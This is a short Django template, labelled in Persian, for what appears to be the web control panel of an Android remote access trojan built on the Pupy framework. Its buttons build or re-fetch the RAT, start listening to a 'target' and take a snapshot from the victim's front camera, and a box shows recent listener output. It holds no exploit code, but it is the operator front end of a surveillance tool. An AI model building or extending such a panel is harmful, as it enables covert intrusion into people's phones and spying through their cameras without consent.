{% extends "base_generic.html" %}

{% block content %}
<div class="w3-raw">

<div class="w3-quarter">
  <a href="{% url 'RAT:pupy/android/startlisten' %}" class="w3-button w3-block w3-green w3-section">شروع بررسی تارگت</a>
  <a class="w3-bar-item w3-button w3-padding-large" href="{% url 'RAT:pupy/android/add' %}">ساخت یا دریافت مجدد رت</a>

  </div>


  <a href="{% url 'RAT:pupy/android/listen' %}" class="w3-button w3-block w3-red w3-section" ><i>{{last4}}<br>{{last3}}<br>{{last2}}<br>{{last2}}<br>{{last}}</i></a>

</div>



{% endblock %}
{% block content1 %}
<div class="w3-container w3-card w3-white w3-round w3-margin w3-center"><br>
  <div class="w3-center" style="margin-left=40px;">

        <a href="{% url 'RAT:pupy/android/webcamsnap' %}" class="w3-center w3-quarter w3-button w3-block w3-{{ color }} w3-section w3-margin" >گرفتن دوربین جلو</a>


</div>


</div>
{% endblock %}




<!-- End Middle Column -->
